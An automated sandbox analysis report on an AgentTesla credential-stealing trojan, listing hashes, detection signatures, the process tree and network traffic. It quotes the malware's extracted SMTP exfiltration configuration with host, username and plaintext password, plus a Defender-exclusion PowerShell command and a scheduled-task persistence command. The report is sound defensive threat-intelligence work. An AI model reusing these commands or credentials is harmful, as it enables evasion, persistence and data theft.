Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe

Overview

General Information

Sample name:SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe
Analysis ID:1419145
MD5:aa4e9485a220716bca4854ac0007a125
SHA1:60bd405dae72469a7104ef7df6e714c141085dc8
SHA256:79e473fb7f021d7b394ac013c2abcca1a094a918b6f2edb48c0ed18d7b3b7460
Tags:exe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Uncommon Svchost Parent Process
Tries to load missing DLLs
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe (PID: 5616 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe" MD5: AA4E9485A220716BCA4854AC0007A125)
    • powershell.exe (PID: 6216 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7428 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 5892 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tXBTtgndxsp" /XML "C:\Users\user\AppData\Local\Temp\tmpD46C.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • svchost.exe (PID: 5892 cmdline: C:\Windows\system32\svchost.exe -k LocalService -s W32Time MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • tXBTtgndxsp.exe (PID: 7356 cmdline: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe MD5: AA4E9485A220716BCA4854AC0007A125)
    • schtasks.exe (PID: 8076 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tXBTtgndxsp" /XML "C:\Users\user\AppData\Local\Temp\tmpE610.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 8084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • tXBTtgndxsp.exe (PID: 8128 cmdline: "C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe" MD5: AA4E9485A220716BCA4854AC0007A125)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "nl9.nlkoddos.com", "Username": "222@barceltricot.eu", "Password": "Myname321@"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.3700297871.0000000002EED000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000007.00000002.3700297871.0000000002EE5000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000014.00000002.3700333358.0000000002C8B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000007.00000002.3700297871.0000000002EC1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000007.00000002.3700297871.0000000002EC1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 12 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.3a40010.6.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.3a40010.6.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.3a40010.6.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                • 0x31433:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                • 0x314a5:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                • 0x3152f:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                • 0x315c1:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                • 0x3162b:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                • 0x3169d:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                • 0x31733:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                • 0x317c3:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.3a7a830.8.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.3a7a830.8.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    Click to see the 9 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, ParentProcessId: 5616, ParentProcessName: SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe", ProcessId: 6216, ProcessName: powershell.exe
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, ParentProcessId: 5616, ParentProcessName: SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe", ProcessId: 6216, ProcessName: powershell.exe
                    Sigma detected: Suspicious Add Scheduled Task Parent
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tXBTtgndxsp" /XML "C:\Users\user\AppData\Local\Temp\tmpE610.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tXBTtgndxsp" /XML "C:\Users\user\AppData\Local\Temp\tmpE610.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe, ParentImage: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe, ParentProcessId: 7356, ParentProcessName: tXBTtgndxsp.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tXBTtgndxsp" /XML "C:\Users\user\AppData\Local\Temp\tmpE610.tmp", ProcessId: 8076, ProcessName: schtasks.exe
                    Sigma detected: Suspicious Outbound SMTP Connections
                    Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 89.249.49.141, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, Initiated: true, ProcessId: 7272, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49709
                    Sigma detected: Suspicious Schtasks From Env Var Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tXBTtgndxsp" /XML "C:\Users\user\AppData\Local\Temp\tmpD46C.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tXBTtgndxsp" /XML "C:\Users\user\AppData\Local\Temp\tmpD46C.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, ParentProcessId: 5616, ParentProcessName: SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tXBTtgndxsp" /XML "C:\Users\user\AppData\Local\Temp\tmpD46C.tmp", ProcessId: 5892, ProcessName: schtasks.exe
                    Sigma detected: Uncommon Svchost Parent Process
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k LocalService -s W32Time, CommandLine: C:\Windows\system32\svchost.exe -k LocalService -s W32Time, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, ParentProcessId: 5616, ParentProcessName: SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k LocalService -s W32Time, ProcessId: 5892, ProcessName: svchost.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, ParentProcessId: 5616, ParentProcessName: SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe", ProcessId: 6216, ProcessName: powershell.exe
                    Sigma detected: Windows Processes Suspicious Parent Directory
                    Source: Process startedAuthor: vburov: Data: Command: C:\Windows\system32\svchost.exe -k LocalService -s W32Time, CommandLine: C:\Windows\system32\svchost.exe -k LocalService -s W32Time, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, ParentProcessId: 5616, ParentProcessName: SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k LocalService -s W32Time, ProcessId: 5892, ProcessName: svchost.exe

                    Persistence and Installation Behavior

                    barindex
                    Sigma detected: Scheduled temp file as task from temp location
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tXBTtgndxsp" /XML "C:\Users\user\AppData\Local\Temp\tmpD46C.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tXBTtgndxsp" /XML "C:\Users\user\AppData\Local\Temp\tmpD46C.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, ParentProcessId: 5616, ParentProcessName: SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tXBTtgndxsp" /XML "C:\Users\user\AppData\Local\Temp\tmpD46C.tmp", ProcessId: 5892, ProcessName: schtasks.exe

                    Snort Signatures

                    No Snort rule has matched

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeAvira: detected
                    Antivirus detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeAvira: detection malicious, Label: HEUR/AGEN.1323752
                    Found malware configuration
                    Source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.3a7a830.8.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "nl9.nlkoddos.com", "Username": "222@barceltricot.eu", "Password": "Myname321@"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeReversingLabs: Detection: 15%
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeVirustotal: Detection: 31%Perma Link
                    Multi AV Scanner detection for submitted file
                    Source: SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeReversingLabs: Detection: 15%
                    Source: SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeVirustotal: Detection: 31%Perma Link
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeJoe Sandbox ML: detected
                    Source: SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.7:49707 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.7:49711 version: TLS 1.2
                    Source: SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeCode function: 4x nop then jmp 06A5A4CDh0_2_06A59D23
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeCode function: 4x nop then jmp 06A5A4CDh0_2_06A5A3FF
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeCode function: 4x nop then jmp 0674932Dh8_2_0674925F
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeCode function: 4x nop then jmp 0674932Dh8_2_06748B83

                    Networking

                    barindex
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.3a7a830.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.3a40010.6.raw.unpack, type: UNPACKEDPE
                    Source: global trafficTCP traffic: 192.168.2.7:49709 -> 89.249.49.141:587
                    Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                    Source: Joe Sandbox ViewIP Address: 89.249.49.141 89.249.49.141
                    Source: Joe Sandbox ViewASN Name: IPCTRU IPCTRU
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: api.ipify.org
                    Source: unknownDNS query: name: api.ipify.org
                    Source: unknownDNS query: name: api.ipify.org
                    Source: global trafficTCP traffic: 192.168.2.7:49709 -> 89.249.49.141:587
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: unknownDNS traffic detected: queries for: api.ipify.org
                    Source: SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000007.00000002.3700297871.0000000002EED000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000007.00000002.3723701620.0000000009588000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000007.00000002.3692396965.0000000000FE7000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000007.00000002.3700297871.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000007.00000002.3723701620.0000000009500000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000007.00000002.3700297871.0000000002F07000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000007.00000002.3700297871.00000000031F9000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000007.00000002.3710478603.0000000006762000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000007.00000002.3700297871.0000000002F49000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000007.00000002.3700297871.000000000318A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000007.00000002.3700297871.0000000003074000.00000004.00000800.00020000.00000000.sdmp, tXBTtgndxsp.exe, 00000014.00000002.3700333358.0000000002E79000.00000004.00000800.00020000.00000000.sdmp, tXBTtgndxsp.exe, 00000014.00000002.3721929189.0000000009506000.00000004.00000020.00020000.00000000.sdmp, tXBTtgndxsp.exe, 00000014.00000002.3700333358.000000000311B000.00000004.00000800.00020000.00000000.sdmp, tXBTtgndxsp.exe, 00000014.00000002.3700333358.0000000002FAA000.00000004.00000800.00020000.00000000.sdmp, tXBTtgndxsp.exe, 00000014.00000002.3693836646.0000000000F03000.00000004.00000020.00020000.00000000.sdmp, tXBTtgndxsp.exe, 00000014.00000002.3712423280.000000000643F000.00000004.00000020.00020000.00000000.sdmp, tXBTtgndxsp.exe, 00000014.00000002.3700333358.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, tXBTtgndxsp.exe, 00000014.00000002.3721345790.0000000009482000.00000004.00000020.00020000.00000000.sdmp, tXBTtgndxsp.exe, 00000014.00000002.3711816853.000000000641A000.00000004.00000020.00020000.00000000.sdmp, tXBTtgndxsp.exe, 00000014.00000002.3721555749.00000000094CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                    Source: SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000007.00000002.3723701620.0000000009500000.00000004.00000020.00020000.00000000.sdmp, tXBTtgndxsp.exe, 00000014.00000002.3711816853.00000000063CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                    Source: SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, tXBTtgndxsp.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                    Source: SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, tXBTtgndxsp.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                    Source: SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000007.00000002.3700297871.0000000002EED000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000007.00000002.3723701620.0000000009588000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000007.00000002.3692396965.0000000000FE7000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000007.00000002.3700297871.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000007.00000002.3723701620.0000000009500000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000007.00000002.3700297871.0000000002F07000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000007.00000002.3700297871.00000000031F9000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000007.00000002.3710478603.0000000006762000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000007.00000002.3700297871.0000000002F49000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000007.00000002.3700297871.000000000318A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000007.00000002.3700297871.0000000003074000.00000004.00000800.00020000.00000000.sdmp, tXBTtgndxsp.exe, 00000014.00000002.3700333358.0000000002E79000.00000004.00000800.00020000.00000000.sdmp, tXBTtgndxsp.exe, 00000014.00000002.3700333358.000000000311B000.00000004.00000800.00020000.00000000.sdmp, tXBTtgndxsp.exe, 00000014.00000002.3700333358.0000000002FAA000.00000004.00000800.00020000.00000000.sdmp, tXBTtgndxsp.exe, 00000014.00000002.3693836646.0000000000F03000.00000004.00000020.00020000.00000000.sdmp, tXBTtgndxsp.exe, 00000014.00000002.3712423280.000000000643F000.00000004.00000020.00020000.00000000.sdmp, tXBTtgndxsp.exe, 00000014.00000002.3700333358.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, tXBTtgndxsp.exe, 00000014.00000002.3721192525.0000000009470000.00000004.00000020.00020000.00000000.sdmp, tXBTtgndxsp.exe, 00000014.00000002.3700333358.0000000002C8B000.00000004.00000800.00020000.00000000.sdmp, tXBTtgndxsp.exe, 00000014.00000002.3700333358.0000000002CFC000.00000004.00000800.00020000.00000000.sdmp, tXBTtgndxsp.exe, 00000014.00000002.3693836646.0000000000EB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/cPanelIncCertificationAuthority.crl0
